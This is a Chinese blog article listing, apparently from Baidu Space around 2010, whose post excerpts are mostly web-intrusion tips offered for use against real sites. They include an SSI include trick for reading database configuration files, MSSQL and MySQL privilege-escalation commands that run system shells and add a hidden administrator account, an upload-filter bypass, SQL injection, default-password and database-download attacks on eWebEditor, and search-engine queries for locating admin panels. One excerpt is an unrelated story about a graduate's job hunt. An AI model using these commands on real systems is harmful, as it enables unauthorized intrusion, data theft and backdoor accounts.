文章列表
 
2011年04月19日 星期二 15:08
 
2010年07月28日 星期三 9:32

/usr/local/Zend/etc/php.ini

 
2010年06月18日 星期五 9:17
平儿是去年毕业的大学生,就读于河北的某大学,学的是计算机专业,原本以为是个热门行业,没 想到毕业了东找西找,就是找不到工作,次的单位不想去,好的单位要想进比登天还难。  平儿的父亲在村子里社交已经算很广了,也有几个比较铁的哥们,他拜托这些哥们帮女儿找个 好一点的单位。朋友托朋友,最后传过话来,进市里的XX单位需要十几万,就是进稍差一点的单位也得七八万活动资金,否则没戏。说白了,没钱你有文凭那也是 白搭,没关系人家鸟也不鸟你,人才有的是,研究生博士生都一抓一大把,何况是本科生。
  平儿知道家里的
 
2010年05月11日 星期二 11:44


方法:上传一个shtm文件, 内容为:

<!--#include file="conn.asp"-->

直接请求这个shtm文件, conn.asp就一览无遗, 数据库路径也就到手啦!

解析:

<!--#include file="conn.asp"-->
就是一条SSI指令,其作用是将"conn.asp"的内容拷贝到当前的页面中,当访问者来浏览时,会看到其

它HTML文档一样显示conn.asp其中的内容。

前提:服务器的对shtm或者shtml的扩展没有删除!

至于conn.asp可以为其他,比如config.inc.php config.asp

 
2010年05月11日 星期二 11:39
以下方法都以需要SA权限为前提。

1, 沙盒模式的变通.


原始方法:

第一句开启沙盘模式:exec master..xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Jet\4.0\Engines’,’SandBoxMode’,’REG_DWORD’,1
复制代码第二句利用jet.oledb执行系统命令:select * from openrowset(’microsoft.jet.oledb.4.0’,’;database=ias\dnary.mdb’,’select shell("CMD命令")’)  
复制代码或select *

 
2010年05月11日 星期二 11:38


mysql提权总结方法四则

一 UDF提权
这类提权方法我想大家已经知道了,我大致写一下,具体语句如下:
create function cmdshell returns string soname 'udf.dll'  
select cmdshell('net user iis_user 123!@#abcABC /add');  
select cmdshell('net localgroup administrators iis_user /add');  
select cmdshell('regedit /s d:\web\3389.reg');  
drop function cmdshell;  

 
2010年05月11日 星期二 11:37


1、
对一般遇到.net的网站时
通常会注册个用户
第一选择利用上传判断的漏洞 加图片头GIF89A 顺利饶过

2、
第二种就是注入了, 在?id=xx后加单引号 " ' "
一般情况下 用NBSI 啊D来SCAN 都可以发现BUG页面
而且国内大多.net都是使用MSSQL数据库
发现注入点也可以从login下手 其实这个方法目前的成功率在75%


3、
不过遇到搜索型的,和没错误信息回显的时候 在这里就卡住了
大家可以看看网上一篇 搜索型注入的文章 运气好,数据库和WEB在一起
直接在搜索里

 
2010年05月11日 星期二 11:34


Ewebeditor大家应该是再熟悉不过的吧?先用默认密码admin888登陆,不行就下载默认数据库‘/db/ewebeditor.mdb”,如 果默认数据库也改了的话我们是不是就该放弃了呢?这里告诉大家我的经验!就是用密码admin999登陆,或者输入“/db /ewebeditor1013.mdb”就能下载到数据库了。这个方法有%80的几率能拿下目标!
-------------------------------------------------------------------------------------
eWebEditor的另类入侵
有一个办法可以在没有登陆eWebEditor的情况下传我们的ASP或ASA

 
2010年05月11日 星期二 11:27
 
2010年05月11日 星期二 11:23
1.工具辅助查找

如大家常用的:明小子、啊D、wwwscan

以及一些列目录工具:Acunetix Web Vulnerability Scanner 、JSky、IntelliTamper、Netsparker...等等

2.网站资源利用

如:网站根目录Robots.txt文本、图片路径爆后台、查看网站底部版权信息是否有连接、通过网站里的文件名查询源码下载得知

3.搜索引擎查询

命令很多种列几种自己常用的吧:

site:heimian.com intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|manage|admin|login|system
site:heimian.com inur
 
   
 
 
文章分类
 
   
 
文章存档
 
     
 
最新文章评论
  

我做内网补丁分发,可取到的补丁数总是为O; 请问怎么设置内网的WSUS服务器
 

谢谢,非常有用。
 

真的十分感谢,OK了!谢谢!
 

[表情]
 

谁可以帮我破解这个游戏官方网我不会破解 游戏online的官方网是www.ranmy.com破解了
   
帮助中心 | 空间客服 | 投诉中心 | 空间协议
©2012 Baidu